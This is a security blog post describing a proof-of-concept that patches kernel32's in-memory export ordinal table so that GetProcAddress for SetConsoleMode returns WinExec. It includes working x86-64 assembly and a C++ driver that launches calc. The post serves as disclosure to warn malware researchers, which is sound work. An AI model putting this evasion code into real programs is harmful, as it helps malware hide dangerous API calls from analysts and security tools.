Deep Dive Into Windows PE Format - GetProcAddress Spoofing - Malware researchers - Beware of GetProcAddress spoofing via manipulation of PE format in memory.

Intro

Quite often malware authors choose not to use load-time linking to call Windows APIs. Instead they prefer to obfuscate those calls by loading and resolving API pointers dynamically. I wrote about it already in the preface to my previous blog post.

The idea is very simple, really. Let's take this code snippet:

C++[Copy]

//Load the module
HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

//Declare the function in it
BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);

//Resolve its pointer
(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

//Check if we actually got the function pointer
if(pfnSetConsoleMode)
{
    //And call the function
	BOOL bResult = pfnSetConsoleMode(hConsole, 1);
}

//Lastly unload the module
::FreeLibrary(hMod);

In the snippet above we load the kernel32.dll using a call to LoadLibrary, then declare our function prototype that we want to resolve. In this case I took SetConsoleMode as an example. (At this stage it will be wise to check if we got the function pointer.) And finally call it and do the obligatory clean-up.

As you can see, this involves quite a lot of steps, versus just doing this:

C++[Copy]

BOOL bResult = SetConsoleMode(hConsole, 1);

For the malware authors though the main benefit of using the long method is obfuscation, or the ability to hide system calls inside their module. Any time you use load-time linking, like in the short code sample above, the name of the API is placed into the import table for the module, and thus calls to such API can be easily traced inside a reverse-engineering tool (such as Ghidra, IDA, etc.)

So at this point most malware researchers are aware of the way APIs can be resolved dynamically via a call to GetProcAddress, so they can trace down all calls to that function and check the second parameter, or lpProcName, for the presence of high risk APIs (or those that can download and run the actual payload for the malware.) This usually helps them to narrow down and eliminate API calls that don't pose much of a security risk. Such as the SetConsoleMode API that I showed above.

But let's see if that is really the case.

Below I will present my proof-of-concept (PoC) that will demonstrate that by just relying on the name of the function that you pass into GetProcAddress is not enough to ensure that it actually returns the pointer to the function specified in its second parameter, or lpProcName.

GetProcAddress Spoof

The issue at hand is in the way PE file is loaded (and mapped) into memory, and also in the way how GetProcAddress uses it to resolve function pointers.

In a nutshell, GetProcAddress parses the PE header of the module that was specified in its first parameter, or hModule. Such module must have been already mapped into the memory of the process. So if we modify the PE header of the needed module to replace some innocuous API with a high risk one, a call to GetProcAddress for the former will return the pointer to the latter.

Let's review it in more details.

Question to you. In the following example, is it always guaranteed that pfnSetConsoleMode variable will point to a genuine SetConsoleMode function?

C++[Copy]

HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);
(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

BOOL bResult = pfnSetConsoleMode(hConsole, 1);

::FreeLibrary(hMod);

I hope you said, "NO, absolutely not!"

Here's how one can spoof it.

PoC

First, LoadLibrary doesn't necessarily load the kernel32.dll module "fresh" in that instance. If earlier in the malware process the author called LoadLibrary on the same module and did not free it with a call to FreeLibrary, then any subsequent calls to LoadLibrary will not load it anew, and instead will simply reuse a previously mapped module.

Secondly, some modules are loaded into all non-native-system processes by default. Such modules are ntdll.dll and kernel32.dll, so you don't really need to call LoadLibrary/FreeLibrary on them, and instead you can get away with just calling GetModuleHandle.

My point here is that once a DLL is mapped into the process, we can modify its memory any way we like. We just may need to set its memory protection into writable using VirtualProtect. (Note that in this case we do not need the "PAGE_EXECUTE_*" protection flag, that most malware researchers and anti-malware software will be zeroing in on.)

The next step is just to parse the PE format of the loaded module and to locate the function offset in its export table. In our example, we'll be using the SetConsoleMode function because it is truly innocuous, and it its pure form it does not pose any security threats. (The reason I chose that function is because it has the same number of parameters as the high risk function that I want to spoof it with, WinExec. Moreover, the types of parameters that it calls are the same: first is the pointer and the second one is an integer.)

I wrote the spoof itself in Assembly for x86-64. But basically the gist is the following: we locate the kernel32 in our process, then walk through its PE header, and find its export table. Then we enumerate through all of its exported functions by name, looking for our SetConsoleMode and also for WinExec. I specifically chose SetConsoleMode to be in the same module as my needed WinExec. For that I used the WinAPI Search tool to enumerate all exported functions from kernel32.dll and checked their prototypes to match call parameters to WinExec.

Then once we find both functions in the PE header, I adjust the memory protection for the page using VirtualProtect, and then swap their offsets in the AddressOfNameOrdinals table of the PE header.

x86-64[Copy]

extrn VirtualProtect : proc

.data
dummy	dd ?

.code

spoof_data PROC

	; INFO: Unoptimized assembly code to improve readability

	push    rsi
	push    rdi
	sub     rsp, 40h

	mov     rax, gs:[60h]		; PEB
	mov     rax, [rax + 18h]	; Ldr
	mov     rax, [rax + 20h]	; InMemoryOrderModuleList
	mov     rax, [rax]			; Skip our module and get to ntdll
	mov     rax, [rax]			; Skip ntdll and get to kernel32
	mov     rcx, [rax + 20h]	; rcx = DllBase for kernel32

	mov     eax, [rcx + 3Ch]	; e_lfanew
	add     rax, rcx			; rax = IMAGE_NT_HEADERS64
	lea     rax, [rax + 18h]	; rax = IMAGE_OPTIONAL_HEADER64
	lea     rax, [rax + 70h]	; rax = IMAGE_DATA_DIRECTORY
	lea     rax, [rax + 0h]		; rax = IMAGE_DATA_DIRECTORY for IMAGE_DIRECTORY_ENTRY_EXPORT

	mov     edx, [rax]			; rdx = VirtualAddress
	lea     rax, [rcx + rdx]	; rax = IMAGE_EXPORT_DIRECTORY

	mov     edx, [rax + 18h]	; rdx = NumberOfNames
	mov     r8d, [rax + 20h]	; r8 = AddressOfNames
	lea     r8, [rcx + r8]

	xor     rsi, rsi
	xor     rdi, rdi

	mov     r10, 6f736e6f43746553h	 ;	SetConso
	mov     r11, 0065646f4d656c6fh	 ;	oleMode\0

@@1:
	mov     r9d, [r8]
	lea     r9, [rcx + r9]		; function name

	; search for SetConsoleMode
	cmp     r10, [r9]
	jnz     @@2
	cmp     r11, [r9 + 7]
	jnz     @@2

	; prevent repeated matches (just in case)
	test    rsi, rsi
	jnz     @@bad

	; got it! remember the index
	mov     rsi, rdx
	neg     rsi

@@2:
	add     r8, 4
	dec     rdx
	jnz     @@1
	
	; Did we find our first function?
	test    rsi, rsi
	jz      @@bad

	mov     edx, [rax + 18h]	; rdx = NumberOfNames
	mov     r8d, [rax + 20h]	; r8 = AddressOfNames
	lea     r8, [rcx + r8]

@@3:
	mov     r9d, [r8]
	lea     r9, [rcx + r9]		; function name

	; Search for WinExec
	cmp     word ptr [r9], 6957h
	jnz     @@4
	cmp     byte ptr [r9 + 3], 45h
	jnz     @@4
	cmp     byte ptr [r9 + 7], 0
	jnz     @@4

	; prevent repeated matches (just in case)
	test    rdi, rdi
	jnz     @@bad

	; got it, remember the index
	mov     rdi, rdx
	neg     rdi

@@4:
	add     r8, 4
	dec     rdx
	jnz     @@3

	; Did we find our second function?
	test    rdi, rdi
	jz      @@bad


	; Convert two of the indices that we found
	; to addresses in AddressOfNameOrdinals array in mapped PE file

	mov     r10d, [rax + 18h]	; r10 = NumberOfNames
	lea     rsi, [r10 + rsi]	; rsi = function index in NumberOfNames: SetConsoleMode
	lea     rdi, [r10 + rdi]	; rdi = function index in NumberOfNames: WinExec

	mov     r10d, [rax + 24h]	; r10 = AddressOfNameOrdinals
	lea     r10, [rcx + r10]

	lea     rsi, [r10 + rsi * 2]	; rsi = address of index of SetConsoleMode in the AddressOfNameOrdinals table
	lea     rdi, [r10 + rdi * 2]	; rdi = address of index of WinExec in the AddressOfNameOrdinals table

		
	; Change memory protection
	mov     rcx, rsi
	mov     rdx, 2
	mov     r8, 4				; 4 = PAGE_READWRITE
	lea     r9, dummy
	call    VirtualProtect
	test    rax, rax
	jz      @@bad

	; Just in case two addresses span to another page
	mov     rcx, rdi
	mov     rdx, 2
	mov     r8, 4				; 4 = PAGE_READWRITE
	lea     r9, dummy
	call    VirtualProtect
	test    rax, rax
	jz      @@bad


	; Swap WORD indices for two APIs
	mov     ax, word ptr [rsi]
	mov     cx, word ptr [rdi]
	mov     word ptr [rsi], cx
	mov     word ptr [rdi], ax


	; We can technically restore back the memory protection here ....


	; Success
	xor     eax, eax
	inc     rax

	add     rsp, 40h
	pop     rdi
	pop     rsi
	ret

bad:
	; Failure
	xor     eax, eax

	add     rsp, 40h
	pop     rdi
	pop     rsi
	ret
spoof_data ENDP

And that is it.

After that all I need to do is to call GetProcAddress on SetConsoleMode and it will give me the pointer to WinExec. And because we can call our spoof_data anywhere in the code, we can do it very early on, way before we actually need to call GetProcAddress, which will obfuscate it even more.

For simplicity though, this is how my PoC will look like if we add the spoofing:

C++[Copy]

#ifndef _M_X64
//I didn't want to make this post too long by providing a separate assembly function for x86. But it's quite doable there as well ...
#error This_POC_must_be_compiled_as_x64
#endif

int main()
{
	if(spoof_data())
	{
		HMODULE hMod = ::LoadLibrary(L"kernel32.dll");

		BOOL (WINAPI *pfnSetConsoleMode)(HANDLE hConsoleHandle, DWORD dwMode);
		(FARPROC&)pfnSetConsoleMode = ::GetProcAddress(hMod, "SetConsoleMode");

		ULONGLONG uiV = 0x0000000636c6163;
		BOOL bResult = pfnSetConsoleMode(&uiV, 1);	
		
		wprintf(L"You must see the Calculator now....\n");

		::FreeLibrary(hMod);
	}
	else
	{
		wprintf(L"ERROR: PoC failed...\n");
	}

	return 0;
}

The only thing to add here, is how I'm calling pfnSetConsoleMode (which is indeed a pointer to WinExec.) As you can see I'm passing a pointer to a string calc in the first parameter, which is ASCII-encoded in 0x0000000636c6163. And the second parameter is SW_SHOWNORMAL, or 1.

In normal circumstances, if you comment out the call to spoof_data, a further call to pfnSetConsoleMode (or a genuine SetConsoleMode) will fail because the first parameter is not an hConsoleHandle. That call will only have some meaning for the spoof.

Conclusion

I submitted this spoof to Microsoft Security Response Center on August 25, 2020, but they quickly brushed it off with the following response on August 28, 2020:

Hi Dennis,

Thank you for your submission. We determined your finding does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria).

An attacker that can modify binaries on a victim system has already achieved execution on that system.

Thank you for helping us protect our customers! For more information about our Security Development Lifecycle, please visit https://www.microsoft.com/en-us/sdl/default.aspx.

**Name-Redacted**
MSRC

Because I failed to convince the vendor to fix the issue, the purpose of this posting is to alert security and malware researchers of the way how a call to GetProcAddress can be spoofed, and thus cannot be relied upon.

Afterthought

Note that this blog post does not have a compilable code project, nor that I'm providing a GitHub link with the code. The idea is to prevent script-kiddies from copying it one-to-one into their malware. I hope the reader of this blog can understand it. Anyone with sufficient knowledge of the PE format will immediately grasp the concept.